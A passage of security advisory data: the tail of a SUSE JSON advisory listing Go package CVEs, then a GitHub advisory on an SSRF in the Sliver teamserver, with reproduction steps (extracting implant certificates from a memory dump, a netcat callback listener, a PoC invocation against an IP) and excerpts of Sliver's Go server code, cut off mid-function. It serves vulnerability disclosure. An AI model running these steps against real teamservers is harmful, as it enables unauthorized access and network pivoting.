"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-25279",
"url": "https://www.suse.com/security/cve/CVE-2025-25279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-25279"
},
{
"cve": "CVE-2025-25294",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-25294"
}
],
"notes": [
{
"category": "general",
"text": "Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. In all Envoy Gateway versions prior to 1.2.7 and 1.3.1 a default Envoy Proxy access log configuration is used. This format is vulnerable to log injection attacks. If the attacker uses a specially crafted user-agent which performs json injection, then he could add and overwrite fields to the access log. This vulnerability is fixed in 1.3.1 and 1.2.7. One can overwrite the old text based default format with JSON formatter by modifying the \"EnvoyProxy.spec.telemetry.accessLog\" setting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-25294",
"url": "https://www.suse.com/security/cve/CVE-2025-25294"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-25294"
},
{
"cve": "CVE-2025-27088",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27088"
}
],
"notes": [
{
"category": "general",
"text": "oxyno-zeta/s3-proxy is an aws s3 proxy written in go. In affected versions a Reflected Cross-site Scripting (XSS) vulnerability enables attackers to create malicious URLs that, when visited, inject scripts into the web application. This can lead to session hijacking or phishing attacks on a trusted domain, posing a moderate risk to all users. It\u0027s possible to inject html elements, including scripts through the folder-list template. The affected template allows users to interact with the URL path provided by the `Request.URL.Path` variable, which is then rendered directly into the HTML without proper sanitization or escaping. This can be abused by attackers who craft a malicious URL containing injected HTML or JavaScript. When users visit such a URL, the malicious script will be executed in the user\u0027s context. This issue has been addressed in version 4.18.1 and all users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27088",
"url": "https://www.suse.com/security/cve/CVE-2025-27088"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27088"
},
{
"cve": "CVE-2025-27090",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27090"
}
],
"notes": [
{
"category": "general",
"text": "Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server\u0027s IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27090",
"url": "https://www.suse.com/security/cve/CVE-2025-27090"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27090"
},
{
"cve": "CVE-2025-27100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27100"
}
],
"notes": [
{
"category": "general",
"text": "lakeFS is an open-source tool that transforms your object storage into a Git-like repository. In affected versions an authenticated user can crash lakeFS by exhausting server memory. This is an authenticated denial-of-service issue. This problem has been patched in version 1.50.0. Users on versions 1.49.1 and below are affected. Users are advised to upgrade. Users unable to upgrade should either set the environment variable `LAKEFS_BLOCKSTORE_S3_DISABLE_PRE_SIGNED_MULTIPART` to `true` or configure the `disable_pre_signed_multipart` key to true in their config yaml.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27100",
"url": "https://www.suse.com/security/cve/CVE-2025-27100"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27100"
},
{
"cve": "CVE-2025-27112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27112"
}
],
"notes": [
{
"category": "general",
"text": "Navidrome is an open source web-based music collection server and streamer. Starting in version 0.52.0 and prior to version 0.54.5, in certain Subsonic API endpoints, a flaw in the authentication check process allows an attacker to specify any arbitrary username that does not exist on the system, along with a salted hash of an empty password. Under these conditions, Navidrome treats the request as authenticated, granting access to various Subsonic endpoints without requiring valid credentials. An attacker can use any non-existent username to bypass the authentication system and gain access to various read-only data in Navidrome, such as user playlists. However, any attempt to modify data fails with a \"permission denied\" error due to insufficient permissions, limiting the impact to unauthorized viewing of information. Version 0.54.5 contains a patch for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27112",
"url": "https://www.suse.com/security/cve/CVE-2025-27112"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27112"
},
{
"cve": "CVE-2025-27144",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27144"
}
],
"notes": [
{
"category": "general",
"text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. In versions on the 4.x branch prior to version 4.0.5, when parsing compact JWS or JWE input, Go JOSE could use excessive memory. The code used strings.Split(token, \".\") to split JWT tokens, which is vulnerable to excessive memory consumption when processing maliciously crafted tokens with a large number of `.` characters. An attacker could exploit this by sending numerous malformed tokens, leading to memory exhaustion and a Denial of Service. Version 4.0.5 fixes this issue. As a workaround, applications could pre-validate that payloads passed to Go JOSE do not contain an excessive number of `.` characters.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27144",
"url": "https://www.suse.com/security/cve/CVE-2025-27144"
},
{
"category": "external",
"summary": "SUSE Bug 1237608 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237608"
},
{
"category": "external",
"summary": "SUSE Bug 1237609 for CVE-2025-27144",
"url": "https://bugzilla.suse.com/1237609"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27144"
},
{
"cve": "CVE-2025-27155",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27155"
}
],
"notes": [
{
"category": "general",
"text": "Pinecone is an experimental overlay routing protocol suite which is the foundation of the current P2P Matrix demos. The Pinecone Simulator (pineconesim) included in Pinecone up to commit ea4c337 is vulnerable to stored cross-site scripting. The payload storage is not permanent and will be wiped when restarting pineconesim.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27155",
"url": "https://www.suse.com/security/cve/CVE-2025-27155"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27155"
},
{
"cve": "CVE-2025-27414",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27414"
}
],
"notes": [
{
"category": "general",
"text": "MinIO is a high performance object storage. Starting in RELEASE.2024-06-06T09-36-42Z and prior to \nRELEASE.2025-02-28T09-55-16Z, a bug in evaluating the trust of the SSH key used in an SFTP connection to MinIO allows authentication bypass and unauthorized data access. On a MinIO server with SFTP access configured and using LDAP as an external identity provider, MinIO supports SSH key based authentication for SFTP connections when the user has the `sshPublicKey` attribute set in their LDAP server. The server trusts the client\u0027s key only when the public key is the same as the `sshPublicKey` attribute. Due to the bug, when the user has no `sshPublicKey` property in LDAP, the server ends up trusting the key allowing the client to perform any FTP operations allowed by the MinIO access policies associated with the LDAP user (or any of their groups). Three requirements must be met in order to exploit the vulnerability. First, the MinIO server must be configured to allow SFTP access and use LDAP as an external identity provider. Second, the attacker must have knowledge of an LDAP username that does not have the `sshPublicKey` property set. Third, such an LDAP username or one of their groups must also have some MinIO access policy configured. When this bug is successfully exploited, the attacker can perform any FTP operations (i.e. reading, writing, deleting and listing objects) allowed by the access policy associated with the LDAP user account (and their groups). Version 1.2.0 fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27414",
"url": "https://www.suse.com/security/cve/CVE-2025-27414"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-27414"
},
{
"cve": "CVE-2025-27421",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27421"
}
],
"notes": [
{
"category": "general",
"text": "Abacus is a highly scalable and stateless counting API. A critical goroutine leak vulnerability has been identified in the Abacus server\u0027s Server-Sent Events (SSE) implementation. The issue occurs when clients disconnect from the /stream endpoint, as the server fails to properly clean up resources and terminate associated goroutines. This leads to resource exhaustion where the server continues running but eventually stops accepting new SSE connections while maintaining high memory usage. The vulnerability specifically involves improper channel cleanup in the event handling mechanism, causing goroutines to remain blocked indefinitely. This vulnerability is fixed in 1.4.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27421",
"url": "https://www.suse.com/security/cve/CVE-2025-27421"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27421"
},
{
"cve": "CVE-2025-27507",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27507"
}
],
"notes": [
{
"category": "general",
"text": "The open-source identity infrastructure software Zitadel allows administrators to disable the user self-registration. ZITADEL\u0027s Admin API contains Insecure Direct Object Reference (IDOR) vulnerabilities that allow authenticated users, without specific IAM roles, to modify sensitive settings. While several endpoints are affected, the most critical vulnerability lies in the ability to manipulate LDAP configurations. Customers who do not utilize LDAP for authentication are not at risk from the most severe aspects of this vulnerability. However, upgrading to the patched version to address all identified issues is strongly recommended. This vulnerability is fixed in 2.71.0, 2.70.1, ,2.69.4, 2.68.4, 2.67.8, 2.66.11, 2.65.6, 2.64.5, and 2.63.8.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27507",
"url": "https://www.suse.com/security/cve/CVE-2025-27507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-27507"
},
{
"cve": "CVE-2025-27509",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27509"
}
],
"notes": [
{
"category": "general",
"text": "fleetdm/fleet is an open source device management, built on osquery. In vulnerable versions of Fleet, an attacker could craft a specially-formed SAML response to forge authentication assertions, provision a new administrative user account if Just-In-Time (JIT) provisioning is enabled, or create new accounts tied to forged assertions if f MDM enrollment is enabled. This vulnerability is fixed in 4.64.2, 4.63.2, 4.62.4, and 4.58.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27509",
"url": "https://www.suse.com/security/cve/CVE-2025-27509"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-27509"
}
]
}
GHSA-FH4V-V779-4G2W
Vulnerability from github – Published: 2025-02-19 21:11 – Updated: 2025-02-20 22:47
VLAI?
Summary
SSRF in sliver teamserver
Details
Summary
The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so
Reproduction steps
Run server
wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
Generate binary
generate --mtls 127.0.0.1:8443
Run it on windows, then Task manager -> find process -> Create memory dump file
Install RogueSliver and get the certs
git clone https://github.com/ACE-Responder/RogueSliver.git
pip3 install -r requirements.txt --break-system-packages
python3 ExtractCerts.py implant.dmp
Start callback listener. Teamserver will connect when POC is run and send "ssrf poc" to nc
nc -nvlp 1111
Run the poc (pasted at bottom of this file)
python3 poc.py <SLIVER IP> <MTLS PORT> <CALLBACK IP> <CALLBACK PORT>
python3 poc.py 192.168.1.33 8443 44.221.186.72 1111
Details
We see here an envelope is read from the connection and if the envelope.Type matches a handler the handler will be executed
func handleSliverConnection(conn net.Conn) {
mtlsLog.Infof("Accepted incoming connection: %s", conn.RemoteAddr())
implantConn := core.NewImplantConnection(consts.MtlsStr, conn.RemoteAddr().String())
defer func() {
mtlsLog.Debugf("mtls connection closing")
conn.Close()
implantConn.Cleanup()
}()
done := make(chan bool)
go func() {
defer func() {
done <- true
}()
handlers := serverHandlers.GetHandlers()
for {
envelope, err := socketReadEnvelope(conn)
if err != nil {
mtlsLog.Errorf("Socket read error %v", err)
return
}
implantConn.UpdateLastMessage()
if envelope.ID != 0 {
implantConn.RespMutex.RLock()
if resp, ok := implantConn.Resp[envelope.ID]; ok {
resp <- envelope // Could deadlock, maybe want to investigate better solutions
}
implantConn.RespMutex.RUnlock()
} else if handler, ok := handlers[envelope.Type]; ok {
mtlsLog.Debugf("Received new mtls message type %d, data: %s", envelope.Type, envelope.Data)
go func() {
respEnvelope := handler(implantConn, envelope.Data)
if respEnvelope != nil {
implantConn.Send <- respEnvelope
}
}()
}
}
}()
Loop:
for {
select {
case envelope := <-implantConn.Send:
err := socketWriteEnvelope(conn, envelope)
if err != nil {
mtlsLog.Errorf("Socket write failed %v", err)
break Loop
}
case <-done:
break Loop
}
}
mtlsLog.Debugf("Closing implant connection %s", implantConn.ID)
}
The available handlers:
func GetHandlers() map[uint32]ServerHandler {
return map[uint32]ServerHandler{
// Sessions
sliverpb.MsgRegister: registerSessionHandler,
sliverpb.MsgTunnelData: tunnelDataHandler,
sliverpb.MsgTunnelClose: tunnelCloseHandler,
sliverpb.MsgPing: pingHandler,
sliverpb.MsgSocksData: socksDataHandler,
// Beacons
sliverpb.MsgBeaconRegister: beaconRegisterHandler,
sliverpb.MsgBeaconTasks: beaconTasksHandler,
// Pivots
sliverpb.MsgPivotPeerEnvelope: pivotPeerEnvelopeHandler,
sliverpb.MsgPivotPeerFailure: pivotPeerFailureHandler,
}
}
If we send an envelope with the envelope.Type equaling MsgTunnelData, we will enter the tunnelDataHandler function
// The handler mutex prevents a send on a closed channel, without it
// two handlers calls may race when a tunnel is quickly created and closed.
func tunnelDataHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {
session := core.Sessions.FromImplantConnection(implantConn)
if session == nil {
sessionHandlerLog.Warnf("Received tunnel data from unknown session: %v", implantConn)
return nil
}
tunnelHandlerMutex.Lock()
defer tunnelHandlerMutex.Unlock()
tunnelData := &sliverpb.TunnelData{}
proto.Unmarshal(data, tunnelData)
sessionHandlerLog.Debugf("[DATA] Sequence on tunnel %d, %d, data: %s", tunnelData.TunnelID, tunnelData.Sequence, tunnelData.Data)
rtunnel := rtunnels.GetRTunnel(tunnelData.TunnelID)
if rtunnel != nil && session.ID == rtunnel.SessionID {
RTunnelDataHandler(tunnelData, rtunnel, implantConn)
} else if rtunnel != nil && session.ID != rtunnel.SessionID {
sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on reverse tunnel it did not own", session.ID)
} else if rtunnel == nil && tunnelData.CreateReverse == true {
createReverseTunnelHandler(implantConn, data)
//RTunnelDataHandler(tunnelData, rtunnel, implantConn)
} else {
tunnel := core.Tunnels.Get(tunnelData.TunnelID)
if tunnel != nil {
if session.ID == tunnel.SessionID {
tunnel.SendDataFromImplant(tunnelData)
} else {
sessionHandlerLog.Warnf("Warning: Session %s attempted to send data on tunnel it did not own", session.ID)
}
} else {
sessionHandlerLog.Warnf("Data sent on nil tunnel %d", tunnelData.TunnelID)
}
}
return nil
}
The createReverseTunnelHandler reads the envelope, creating a socket for req.Rportfwd.Host and req.Rportfwd.Port. It will write recv.Data to it
func createReverseTunnelHandler(implantConn *core.ImplantConnection, data []byte) *sliverpb.Envelope {
session := core.Sessions.FromImplantConnection(implantConn)
req := &sliverpb.TunnelData{}
proto.Unmarshal(data, req)
var defaultDialer = new(net.Dialer)
remoteAddress := fmt.Sprintf("%s:%d", req.Rportfwd.Host, req.Rportfwd.Port)
ctx, cancelContext := context.WithCancel(context.Background())
dst, err := defaultDialer.DialContext(ctx, "tcp", remoteAddress)
//dst, err := net.Dial("tcp", remoteAddress)
if err != nil {
tunnelClose, _ := proto.Marshal(&sliverpb.TunnelData{
Closed: true,
TunnelID: req.TunnelID,
})
implantConn.Send <- &sliverpb.Envelope{
Type: sliverpb.MsgTunnelClose,
Data: tunnelClose,
}
cancelContext()
return nil
}
if conn, ok := dst.(*net.TCPConn); ok {
// {{if .Config.Debug}}
//log.Printf("[portfwd] Configuring keep alive")
// {{end}}
conn.SetKeepAlive(true)
// TODO: Make KeepAlive configurable
conn.SetKeepAlivePeriod(1000 * time.Second)
}
tunnel := rtunnels.NewRTunnel(req.TunnelID, session.ID, dst, dst)
rtunnels.AddRTunnel(tunnel)
cleanup := func(reason error) {
